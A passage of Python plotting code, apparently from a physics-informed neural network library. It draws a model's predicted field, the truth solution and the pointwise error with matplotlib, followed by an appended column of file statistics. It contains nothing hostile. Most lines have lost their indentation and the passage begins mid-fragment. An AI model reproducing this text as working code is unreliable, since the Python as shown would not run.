cb = getattr(axes, method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes)
    def plot(self, obj, component='p', method='contourf', filename=None):
        """Plot one output component of the PINN prediction (e.g. 'p' or
        'ux'), alongside the truth solution and pointwise error when one is
        available."""
        res = 256
        pts = obj.problem.domain.sample(res, 'grid')
        grids_container = [
            pts.tensor[:, 0].reshape(res, res),
            pts.tensor[:, 1].reshape(res, res),
        ]
        predicted_output = obj.model(pts)
        predicted_output = predicted_output[component]
if hasattr(obj.problem, 'truth_solution'):
truth_output = obj.problem.truth_solution(*pts.tensor.T).float()
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(16, 6))
cb = getattr(axes[0], method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[0])
cb = getattr(axes[1], method)(*grids_container, truth_output.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[1])
cb = getattr(axes[2], method)(*grids_container, (truth_output-predicted_output.tensor.float().flatten()).detach().reshape(res, res))
fig.colorbar(cb, ax=axes[2])
else:
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(8, 6))
cb = getattr(axes, method)(*grids_container, predicted_output.reshape(res, res).detach())
fig.colorbar(cb, ax=axes)
if filename:
plt.savefig(filename)
else:
plt.show()
def plot_samples(self, obj):
for location in obj.input_pts:
plt.plot(*obj.input_pts[location].tensor.T.detach(), '.', label=location)
plt.legend()
plt.show()
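# Minimal usage sketch (the trained `PINN` instance named `pinn` and the 'p'
# output component are illustrative assumptions, not part of this module):
#
#     plotter = Plotter()
#     plotter.plot(pinn, component='p', method='contourf', filename='p.png')
#     plotter.plot_samples(pinn)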
| 40.28125
| 144
| 0.596897
| 787
| 6,445
| 4.787802
| 0.120712
| 0.089172
| 0.082803
| 0.063694
| 0.85828
| 0.852972
| 0.852972
| 0.831741
| 0.831741
| 0.831741
| 0
| 0.018542
| 0.255237
| 6,445
| 159
| 145
| 40.534591
| 0.766458
| 0.04422
| 0
| 0.745763
| 0
| 0
| 0.018391
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042373
| false
| 0
| 0.059322
| 0
| 0.110169
| 0.016949
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|